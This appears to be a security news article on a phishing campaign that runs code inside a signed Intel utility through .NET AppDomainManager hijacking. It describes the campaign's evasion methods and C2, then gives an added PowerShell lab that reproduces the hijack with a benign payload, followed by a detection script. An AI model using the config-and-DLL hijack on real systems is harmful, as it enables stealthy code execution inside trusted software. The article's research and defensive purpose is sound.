Hackers exploit AppDomain hijacking to abuse Intel utility for code execution


Cybersecurity researchers have uncovered a malware campaign that abuses a legitimate, digitally signed Intel utility to evade detection and execute malicious code. According to Cyfirma, the attackers run their code inside the Intel binary IAStorHelp.exe using a technique known as AppDomain hijacking (also called AppDomainManager injection).

The technique abuses the .NET AppDomainManager mechanism of the .NET Framework. When the CLR creates a process's default application domain, it consults the executable's configuration (the `<runtime>` section of its .exe.config, or the equivalent APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables) for an assembly and type to use as the domain's AppDomainManager, loads that assembly, and calls its InitializeNewDomain method before the program's own entry point runs. An attacker who can drop a config file and a DLL next to a signed .NET executable therefore gets code executed inside that trusted process without modifying the executable itself: file hashes and the Authenticode signature still check out, and antivirus and endpoint detection products that trust the signed binary are much harder to trigger.

The campaign mainly targets financial organizations in the Middle East and the wider EMEA region.

The attack begins with a spear-phishing email carrying a ZIP archive that contains multiple components, including a malicious shortcut (.lnk) file disguised as a PDF. When the victim opens the shortcut, it launches the Intel utility, which is silently hijacked through a crafted application configuration file (the .exe.config the .NET runtime reads for that executable) pointing at an attacker-supplied AppDomainManager assembly. The runtime loads that assembly during start-up, so the attacker's code executes inside the trusted process before the utility's own code does.
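To make the pre-Main execution described above concrete, the following lab reproduces the hijack against a benign host built on the spot. This is an added example, not code from the Cyfirma report or from the campaign; the host program, the manager class, the directory under $env:TEMP and the assembly names are all chosen here for the demonstration. It needs Windows PowerShell 5.1, because Add-Type there compiles against the .NET Framework and the AppDomainManager settings are honoured only by the .NET Framework runtime (.NET Core/5+ ignore them).

```powershell
# Added example (not from the report): AppDomainManager hijack of a benign .NET host.
# Everything below is built in a scratch directory; nothing signed or system-owned is touched.
$lab = Join-Path $env:TEMP 'adm-lab'
New-Item -ItemType Directory -Force -Path $lab | Out-Null

# 1. Stand-in for the signed host. Note that nothing in it references a manager;
#    the executable is never modified after this point.
Add-Type -OutputType ConsoleApplication -OutputAssembly (Join-Path $lab 'Host.exe') -TypeDefinition @'
using System;
public static class Program {
    public static int Main() {
        Console.WriteLine("[host] Main running");
        return 0;
    }
}
'@

# 2. The attacker-controlled assembly: a subclass of System.AppDomainManager.
#    The CLR instantiates it while setting up the default domain and calls
#    InitializeNewDomain before any of the host's own code. A real payload would
#    decrypt its stage and Assembly.Load() it from memory here.
Add-Type -OutputType Library -OutputAssembly (Join-Path $lab 'DemoManager.dll') -TypeDefinition @'
using System;
public sealed class DemoManager : AppDomainManager {
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo) {
        Console.WriteLine("[manager] InitializeNewDomain in domain '" +
                          AppDomain.CurrentDomain.FriendlyName + "'");
    }
}
'@

# 3. The crafted configuration file. The runtime resolves the assembly by name from
#    the application base directory, so the DLL only has to sit next to the executable.
#    Version 0.0.0.0 is what Add-Type produces when no AssemblyVersion attribute is set.
@'
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>
    <appDomainManagerAssembly value="DemoManager, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="DemoManager" />
  </runtime>
</configuration>
'@ | Set-Content -LiteralPath (Join-Path $lab 'Host.exe.config') -Encoding UTF8

# 4. Run the untouched host. Delete Host.exe.config and run it again to confirm that
#    the config file alone is what pulls DemoManager.dll into the process.
& (Join-Path $lab 'Host.exe')
```

Running Host.exe prints the manager's line before the host's, which is the whole point of the technique: the attacker's assembly is already executing inside the signed process before its Main is reached, and the file a scanner would hash or verify is the unchanged Host.exe. The same effect is obtained without any config file by setting APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE in the environment of the launching shell, which is why a hunt for this technique should look at both.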

The loader uses layered sandbox evasion: a 60-second delay intended to outlast short automated analysis windows, and a computationally expensive key-derivation loop of more than 890,000 SHA-256 iterations that both slows execution and derives the payload key at run time rather than storing it in the binary. The payload is then decrypted and loaded directly into memory using reflective loading, so it never touches disk and bypasses the common loader APIs that security tools monitor.

The malware's command-and-control channel runs over Amazon CloudFront using domain fronting: the TLS connection is made to a benign CloudFront-served hostname while the HTTP Host header names the attacker's own distribution, so network inspection sees traffic to a trusted CDN. Once the channel is up, the attackers have full remote access to the host, exposing credentials, financial data, and intellectual property.

“The framework exhibits strong fault tolerance through heap-based context recovery mechanisms, allowing it to maintain operational continuity even in unstable conditions. Overall, the combination of stealth, modularity, and resilience reflects a highly sophisticated threat capability that challenges conventional detection mechanisms and necessitates a shift toward behavior-driven security monitoring, memory forensics, and encrypted traffic inspection,” the report concludes.
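The report's call for behavior-driven monitoring applies directly to the initial access step: a signed executable whose own .exe.config names an AppDomainManager assembly is a strong, cheap hunting signal. The script below is an added example, not part of the Cyfirma report, that walks a set of directories for *.exe.config files, reports any that set appDomainManagerAssembly or appDomainManagerType, and compares the Authenticode status of the host executable with that of the manager DLL it would load. The sample config it writes to a scratch directory, the assembly name "Helper" and the directories scanned are constructed for the demonstration.

```powershell
# Added example (not from the report): hunt for AppDomainManager hijack artefacts.

function Find-AppDomainManagerHijack {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string[]] $Path
    )
    foreach ($cfg in Get-ChildItem -Path $Path -Recurse -Filter '*.exe.config' -File -ErrorAction SilentlyContinue) {
        try { [xml]$doc = Get-Content -LiteralPath $cfg.FullName -Raw -ErrorAction Stop } catch { continue }

        $rt = $doc.configuration.runtime
        if (-not $rt) { continue }
        $asm  = $rt.appDomainManagerAssembly.value
        $type = $rt.appDomainManagerType.value
        if (-not $asm -and -not $type) { continue }

        # The config belongs to <name>.exe in the same directory.
        $exe    = $cfg.FullName -replace '\.config$', ''
        $exeSig = if (Test-Path -LiteralPath $exe) { (Get-AuthenticodeSignature -LiteralPath $exe).Status } else { 'ExeMissing' }

        # The manager assembly is resolved by simple name from the application base,
        # so "Helper, Version=..." normally means <app dir>\Helper.dll.
        $simple = if ($asm) { ($asm -split ',')[0].Trim() } else { '' }
        $dll    = Join-Path $cfg.DirectoryName "$simple.dll"
        $dllSig = if ($simple -and (Test-Path -LiteralPath $dll)) { (Get-AuthenticodeSignature -LiteralPath $dll).Status } else { 'DllMissing' }

        [pscustomobject]@{
            Config           = $cfg.FullName
            ManagerAssembly  = $asm
            ManagerType      = $type
            HostSignature    = $exeSig
            ManagerSignature = $dllSig
            # The campaign's shape: a validly signed host told to load something that is not.
            Suspicious       = ($exeSig -eq 'Valid' -and $dllSig -ne 'Valid')
        }
    }

    # The same hijack can be configured without any file, through environment variables
    # that every .NET Framework process inheriting them will honour.
    foreach ($v in 'APPDOMAIN_MANAGER_ASM', 'APPDOMAIN_MANAGER_TYPE') {
        $val = [Environment]::GetEnvironmentVariable($v)
        if ($val) { Write-Warning "$v is set to '$val' in the current environment" }
    }
}

# Constructed sample: a config that would make Host.exe load Helper.dll as its manager.
$demo = Join-Path $env:TEMP 'adm-hunt-demo'
New-Item -ItemType Directory -Force -Path $demo | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>
    <appDomainManagerAssembly value="Helper, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="Helper.Manager" />
  </runtime>
</configuration>
'@ | Set-Content -LiteralPath (Join-Path $demo 'Host.exe.config') -Encoding UTF8

# Scan the demo directory plus the user-writable locations where a phishing payload is
# typically unpacked; add application directories as appropriate for the estate.
Find-AppDomainManagerHijack -Path $demo, "$env:USERPROFILE\Downloads", $env:TEMP |
    Format-Table -AutoSize
```

Legitimate software almost never sets these elements in its config, so any hit deserves a look; the combination the campaign relies on, a validly signed host executable paired with an unsigned or missing manager DLL, is flagged in the Suspicious column. For continuous coverage the same logic maps onto file-creation telemetry (a new *.exe.config written into a directory that already holds a signed .NET executable) and onto image-load events showing an unsigned DLL loaded by a signed .NET process shortly after start-up.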
